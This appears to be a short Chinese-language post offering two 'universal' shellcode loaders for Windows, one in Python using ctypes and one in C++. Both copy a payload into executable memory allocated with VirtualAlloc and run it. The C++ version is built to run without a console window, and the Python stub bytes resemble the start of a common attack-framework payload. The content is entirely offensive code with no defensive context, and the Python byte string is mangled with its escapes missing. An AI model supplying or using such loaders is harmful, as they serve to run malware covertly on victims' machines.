Python3 shellcode通用加载器
#!/usr/bin/python3 import ctypes
#shellcode 放这个位置 c = b"xfcxe8x89x00x00x00x60x89xe5x31" shellcode = bytearray(c) ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode))) ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
c++加载器
#include <Windows.h> #include <stdio.h> using namespace std; #pragma comment(linker,"/subsystem:"windows" /entry:"mainCRTStartup"") #pragma comment(linker, "/INCREMENTAL:NO") int main(int argc, char** argv) { unsigned char ShellCode[] = ""; void* exec = VirtualAlloc(0, sizeof ShellCode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, ShellCode, sizeof ShellCode); ((void(*)())exec)(); return 0; }